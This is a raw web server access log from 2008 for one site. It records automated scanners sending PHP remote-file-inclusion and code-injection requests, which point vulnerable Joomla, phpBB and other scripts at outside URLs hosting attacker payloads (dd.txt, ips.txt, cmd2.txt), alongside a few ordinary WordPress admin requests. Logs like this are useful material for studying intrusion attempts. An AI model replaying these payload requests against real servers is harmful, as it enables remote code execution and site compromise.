151.11.24.250 - - [12/Aug/2008:11:23:49 -0700] "GET /logs/access_080315.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:23:49 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:23:50 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:50 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:50 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:23:58 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:24:00 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18529 "-" "libwww-perl/5.76" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:24:13 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:24:15 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:24:21 -0700] "GET /logs/access_080313.log/?sourcedir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:24:23 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:24:26 -0700] "GET /?sourcedir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 200 18367 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:24:27 -0700] "GET /logs/access_080320.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:24:27 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18571 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:24:28 -0700] "GET /logs/access_080320.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:24:28 -0700] "GET /logs/access_080320.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:24:28 -0700] "GET /logs/access_080404.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:24:29 -0700] "GET /logs/access_080320.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:24:29 -0700] "GET /logs/?sourcedir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 200 60283 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:24:30 -0700] "GET /logs/access_080320.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:24:31 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18549 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:24:32 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:24:43 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:24:45 -0700] "GET /logs/access_080229.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:24:46 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18553 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:24:47 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:24:58 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:25:20 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:25:49 -0700] "GET /logs/access.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.187.101.14 - - [12/Aug/2008:11:25:50 -0700] "GET /logs/access_080118.log//components/com_minibb.php?absolute_path=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:11:25:53 -0700] "GET //config.php?path_to_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:11:25:53 -0700] "GET /logs/access_080207.log//config.php?path_to_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:11:25:53 -0700] "GET /logs//config.php?path_to_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:11:25:54 -0700] "GET /logs/access_080213.log//config.php?path_to_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:25:54 -0700] "GET /logs/access.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:25:57 -0700] "GET /logs/access.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:25:58 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:25:58 -0700] "GET /logs/access.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:25:59 -0700] "GET /logs/access.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:26:04 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:26:05 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18545 "-" "libwww-perl/5.810" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:26:09 -0700] "GET /logs/access.log/errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:26:09 -0700] "GET /errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:26:10 -0700] "GET /logs/errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:11:26:14 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:11:26:15 -0700] "GET /logs/index.php?body=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:11:26:16 -0700] "GET /index.php?body=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 200 18407 "-" "libwww-perl/5.812" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:26:24 -0700] "GET /logs/access_080213.log/errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:26:35 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:26:37 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18545 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:26:38 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:26:38 -0700] "GET /logs/access_080229.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:26:41 -0700] "GET /logs/access_080126.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:26:47 -0700] "GET /logs/access_080312.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:26:48 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:26:49 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:11:26:50 -0700] "GET /logs/access_080321.log//index.php?loc=&cat=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:11:26:51 -0700] "GET /logs//index.php?loc=&cat=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.210.62.135 - - [12/Aug/2008:11:26:57 -0700] "GET /logs/access_080211.log HTTP/1.1" 200 1095122 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:26:59 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:27:24 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:27:26 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18545 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:27:27 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:27:33 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:27:36 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:27:40 -0700] "GET /logs/access_080127.log//content.php?seite=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:27:41 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:27:41 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:11:27:54 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:11:27:54 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:27:58 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:28:02 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18571 "-" "libwww-perl/5.76" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:28:11 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:28:11 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:28:12 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:11:28:21 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [12/Aug/2008:11:28:22 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:28:26 -0700] "GET /logs/access_080329.log//index2.php?content=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:28:26 -0700] "GET //index2.php?content=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:28:27 -0700] "GET /logs//index2.php?content=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:28:31 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:11:28:33 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:11:28:33 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:28:33 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:28:43 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.1.210.219 - - [12/Aug/2008:11:28:44 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.210.219 - - [12/Aug/2008:11:28:44 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.202.22.173 - - [12/Aug/2008:11:28:48 -0700] "GET //components/com_simpleboard/image_upload.php?sbphttp://www.bangin-bros.de/picturesolution_211/install/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:28:59 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:29:30 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:29:30 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:29:31 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:11:29:47 -0700] "GET /logs/access_080207.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:29:59 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:29:59 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:29:59 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:30:00 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:30:07 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:30:10 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18553 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:30:17 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:30:19 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18543 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:30:29 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:30:32 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18543 "-" "libwww-perl/5.76" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:30:34 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://paijoe.007gb.com/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:30:35 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:30:35 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:30:37 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:31:00 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:31:15 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:31:18 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
